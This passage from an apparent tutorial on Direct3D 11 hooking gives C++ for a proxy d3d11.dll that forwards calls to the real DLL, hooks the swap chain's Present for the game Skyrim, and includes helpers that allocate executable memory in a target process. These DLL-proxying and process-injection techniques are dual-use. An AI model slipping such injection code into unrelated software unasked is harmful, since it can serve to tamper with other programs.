<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">D3DCompileFromFile</span><span class="p">(</span><span class="n">wPath</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="s">"main"</span><span class="p">,</span> <span class="s">"ps_5_0"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">ps_blob</span><span class="p">,</span> <span class="o">&</span><span class="n">compileErrors</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">compileErrors</span> <span class="o">!=</span> <span class="nb">nullptr</span> <span class="o">&&</span> <span class="n">compileErrors</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ID3D10Blob</span><span class="o">*</span> <span class="n">outErrorsDeref</span> <span class="o">=</span> <span class="n">compileErrors</span><span class="p">;</span>
<span class="n">OutputDebugStringA</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">compileErrors</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">());</span>
<span class="p">}</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreatePixelShader</span><span class="p">(</span><span class="n">ps_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">ps_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">&</span><span class="n">ps</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateMesh</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">const</span> <span class="kt">float</span> <span class="n">vertData</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span>
<span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mf">0.1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span>
<span class="p">};</span>
<span class="n">D3D11_BUFFER_DESC</span> <span class="n">vertBufferDesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferDesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">vertBufferDesc</span><span class="p">));</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">Usage</span> <span class="o">=</span> <span class="n">D3D11_USAGE_DEFAULT</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">ByteWidth</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">float</span><span class="p">)</span> <span class="o">*</span> <span class="mi">6</span> <span class="o">*</span> <span class="mi">3</span><span class="p">;</span> <span class="c1">//6 floats per vert, 3 verts</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">BindFlags</span> <span class="o">=</span> <span class="n">D3D11_BIND_VERTEX_BUFFER</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">CPUAccessFlags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">vertBufferDesc</span><span class="p">.</span><span class="n">MiscFlags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">D3D11_SUBRESOURCE_DATA</span> <span class="n">vertBufferData</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferData</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">vertBufferData</span><span class="p">));</span>
<span class="n">vertBufferData</span><span class="p">.</span><span class="n">pSysMem</span> <span class="o">=</span> <span class="n">vertData</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateBuffer</span><span class="p">(</span><span class="o">&</span><span class="n">vertBufferDesc</span><span class="p">,</span> <span class="o">&</span><span class="n">vertBufferData</span><span class="p">,</span> <span class="o">&</span><span class="n">vertex_buffer</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">res</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateInputLayout</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">D3D11_INPUT_ELEMENT_DESC</span> <span class="n">vertElements</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="p">{</span><span class="s">"POSITION"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">DXGI_FORMAT_R32G32B32_FLOAT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="n">D3D11_INPUT_PER_VERTEX_DATA</span><span class="p">,</span> <span class="mi">0</span><span class="p">},</span>
<span class="p">{</span><span class="s">"COLOR"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">DXGI_FORMAT_R32G32B32_FLOAT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">12</span><span class="p">,</span> <span class="n">D3D11_INPUT_PER_VERTEX_DATA</span><span class="p">,</span> <span class="mi">0</span><span class="p">}</span>
<span class="p">};</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateInputLayout</span><span class="p">(</span><span class="n">vertElements</span><span class="p">,</span> <span class="n">_countof</span><span class="p">(</span><span class="n">vertElements</span><span class="p">),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferPointer</span><span class="p">(),</span> <span class="n">vs_blob</span><span class="o">-></span><span class="n">GetBufferSize</span><span class="p">(),</span> <span class="o">&</span><span class="n">vertLayout</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">CreateRasterizerAndDepthStates</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">D3D11_RASTERIZER_DESC</span> <span class="n">soliddesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">soliddesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">D3D11_RASTERIZER_DESC</span><span class="p">));</span>
<span class="n">soliddesc</span><span class="p">.</span><span class="n">FillMode</span> <span class="o">=</span> <span class="n">D3D11_FILL_SOLID</span><span class="p">;</span>
<span class="n">soliddesc</span><span class="p">.</span><span class="n">CullMode</span> <span class="o">=</span> <span class="n">D3D11_CULL_NONE</span><span class="p">;</span>
<span class="n">HRESULT</span> <span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateRasterizerState</span><span class="p">(</span><span class="o">&</span><span class="n">soliddesc</span><span class="p">,</span> <span class="o">&</span><span class="n">SolidRasterState</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="n">D3D11_DEPTH_STENCIL_DESC</span> <span class="n">depthDesc</span><span class="p">;</span>
<span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&</span><span class="n">depthDesc</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">D3D11_DEPTH_STENCIL_DESC</span><span class="p">));</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthEnable</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthWriteMask</span> <span class="o">=</span> <span class="n">D3D11_DEPTH_WRITE_MASK_ALL</span><span class="p">;</span>
<span class="n">depthDesc</span><span class="p">.</span><span class="n">DepthFunc</span> <span class="o">=</span> <span class="n">D3D11_COMPARISON_ALWAYS</span><span class="p">;</span>
<span class="n">err</span> <span class="o">=</span> <span class="n">device</span><span class="o">-></span><span class="n">CreateDepthStencilState</span><span class="p">(</span><span class="o">&</span><span class="n">depthDesc</span><span class="p">,</span> <span class="o">&</span><span class="n">SolidDepthStencilState</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span> <span class="o">==</span> <span class="n">S_OK</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="nf">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">GetSystemDirectoryA</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span><span class="p">))</span> <span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="n">strcat_s</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">MAX_PATH</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">),</span> <span class="s">"</span><span class="se">\\</span><span class="s">d3d11.dll"</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">d3d_dll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="n">path</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">d3d_dll</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Could Not Locate Original D3D11 DLL"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Darn"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="n">fn_D3D11CreateDeviceAndSwapChain</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">d3d_dll</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"D3D11CreateDeviceAndSwapChain"</span><span class="p">));</span>
<span class="p">}</span>
<span class="kr">inline</span> <span class="kt">void</span><span class="o">**</span> <span class="nf">get_vtable_ptr</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">obj</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o"><</span><span class="kt">void</span><span class="o">***></span><span class="p">(</span><span class="n">obj</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">extern</span> <span class="s">"C"</span> <span class="n">HRESULT</span> <span class="kr">__stdcall</span> <span class="nf">D3D11CreateDeviceAndSwapChain</span><span class="p">(</span>
<span class="n">IDXGIAdapter</span> <span class="o">*</span> <span class="n">pAdapter</span><span class="p">,</span>
<span class="n">D3D_DRIVER_TYPE</span> <span class="n">DriverType</span><span class="p">,</span>
<span class="n">HMODULE</span> <span class="n">Software</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">Flags</span><span class="p">,</span>
<span class="k">const</span> <span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">FeatureLevels</span><span class="p">,</span>
<span class="n">UINT</span> <span class="n">SDKVersion</span><span class="p">,</span>
<span class="k">const</span> <span class="n">DXGI_SWAP_CHAIN_DESC</span> <span class="o">*</span> <span class="n">pSwapChainDesc</span><span class="p">,</span>
<span class="n">IDXGISwapChain</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">,</span>
<span class="n">ID3D11Device</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppDevice</span><span class="p">,</span>
<span class="n">D3D_FEATURE_LEVEL</span> <span class="o">*</span> <span class="n">pFeatureLevel</span><span class="p">,</span>
<span class="n">ID3D11DeviceContext</span> <span class="o">*</span> <span class="o">*</span><span class="n">ppImmediateContext</span>
<span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Calling D3D11CreateDeviceAndSwapChain"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Ok"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">fn_D3D11CreateDeviceAndSwapChain</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span> <span class="o">=</span> <span class="n">LoadD3D11AndGetOriginalFuncPointer</span><span class="p">();</span>
<span class="n">HRESULT</span> <span class="n">res</span> <span class="o">=</span> <span class="n">D3D11CreateDeviceAndSwapChain_Orig</span><span class="p">(</span><span class="n">pAdapter</span><span class="p">,</span> <span class="n">DriverType</span><span class="p">,</span> <span class="n">Software</span><span class="p">,</span> <span class="n">Flags</span><span class="p">,</span> <span class="n">pFeatureLevels</span><span class="p">,</span> <span class="n">FeatureLevels</span><span class="p">,</span> <span class="n">SDKVersion</span><span class="p">,</span> <span class="n">pSwapChainDesc</span><span class="p">,</span> <span class="n">ppSwapChain</span><span class="p">,</span> <span class="n">ppDevice</span><span class="p">,</span> <span class="n">pFeatureLevel</span><span class="p">,</span> <span class="n">ppImmediateContext</span><span class="p">);</span>
<span class="n">HRESULT</span> <span class="n">hr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">ppDevice</span><span class="p">)</span><span class="o">-></span><span class="n">QueryInterface</span><span class="p">(</span><span class="kr">__uuidof</span><span class="p">(</span><span class="n">ID3D11Device5</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">device</span><span class="p">);</span>
<span class="n">hr</span> <span class="o">=</span> <span class="p">(</span><span class="o">*</span><span class="n">ppImmediateContext</span><span class="p">)</span><span class="o">-></span><span class="n">QueryInterface</span><span class="p">(</span><span class="kr">__uuidof</span><span class="p">(</span><span class="n">ID3D11DeviceContext</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span><span class="o">**</span><span class="p">)</span><span class="o">&</span><span class="n">devCon</span><span class="p">);</span>
<span class="n">LoadShaders</span><span class="p">();</span>
<span class="n">CreateMesh</span><span class="p">();</span>
<span class="n">CreateInputLayout</span><span class="p">();</span>
<span class="n">CreateRasterizerAndDepthStates</span><span class="p">();</span>
<span class="n">swapChain</span> <span class="o">=</span> <span class="o">*</span><span class="n">ppSwapChain</span><span class="p">;</span>
<span class="kt">void</span><span class="o">**</span> <span class="n">swapChainVTable</span> <span class="o">=</span> <span class="n">get_vtable_ptr</span><span class="p">(</span><span class="n">swapChain</span><span class="p">);</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">swapChainVTable</span><span class="p">[</span><span class="mi">8</span><span class="p">],</span> <span class="n">DXGISwapChain_Present_Hook</span><span class="p">);</span>
<span class="c1">//present is [8];</span>
<span class="k">return</span> <span class="n">res</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Target app has loaded your proxy d3d11.dll and called DllMain. If you're launching Skyrim via steam, you need to dismiss this popup quickly, otherwise you get a load error"</span><span class="p">),</span> <span class="n">TEXT</span><span class="p">(</span><span class="s">"Success"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Hooking Code (Click To Expand)</summary>
<p>Hooking.h:</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#pragma once
#include <Windows.h>
#include <stdint.h>
</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">);</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">PopAddress</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">trampolinePtr</span><span class="p">);</span></code></pre></figure>
<p>Hooking.cpp:</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="cp">#include "hooking.h"
#include <Windows.h>
#include <stack>
#include <stdio.h>
#include <memoryapi.h>
#include <wow64apiset.h> // for checking is process is 64 bit
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h
#include <Psapi.h>
#include <stdint.h>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include "debug.h"
</span>
<span class="k">thread_local</span> <span class="n">std</span><span class="o">::</span><span class="n">stack</span><span class="o"><</span><span class="kt">uint64_t</span><span class="o">></span> <span class="n">hookJumpAddresses</span><span class="p">;</span>
<span class="cp">#if _WIN64
</span><span class="k">typedef</span> <span class="kt">uint64_t</span> <span class="n">addr_t</span><span class="p">;</span>
<span class="cp">#else
</span><span class="k">typedef</span> <span class="kt">uint32_t</span> <span class="n">addr_t</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="kt">bool</span> <span class="nf">IsProcess64Bit</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">BOOL</span> <span class="n">isWow64</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="n">IsWow64Process</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="o">&</span><span class="n">isWow64</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">isWow64</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//process is 32 bit, running on 64 bit machine</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">return</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">wProcessorArchitecture</span> <span class="o">==</span> <span class="n">PROCESSOR_ARCHITECTURE_AMD64</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocPageInTargetProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">newPage</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">return</span> <span class="n">newPage</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocPage</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">newPage</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">return</span> <span class="n">newPage</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddressRemote</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">handle</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">handle</span><span class="p">));</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">AllocatePageNearAddressRemote</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="n">targetAddr</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//I use subst to alias my development folder to W: </span>
<span class="c1">//this will rebase any virtual drives made by subst to</span>
<span class="c1">//their actual drive equivalent, to prevent conflicts. Likely</span>
<span class="c1">//not important for most people and can be ignored</span>
<span class="kt">void</span> <span class="nf">RebaseVirtualDrivePath</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">path</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">outBuff</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">outBuffSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="kt">char</span> <span class="n">driveLetter</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">driveLetter</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="kt">char</span> <span class="n">deviceDrive</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
<span class="n">QueryDosDevice</span><span class="p">(</span><span class="n">driveLetter</span><span class="p">,</span> <span class="n">deviceDrive</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">virtualDrivePrefix</span> <span class="o">=</span> <span class="s">"</span><span class="se">\\</span><span class="s">??</span><span class="se">\\</span><span class="s">"</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">prefix</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">deviceDrive</span><span class="p">,</span> <span class="n">virtualDrivePrefix</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">prefix</span><span class="p">)</span>
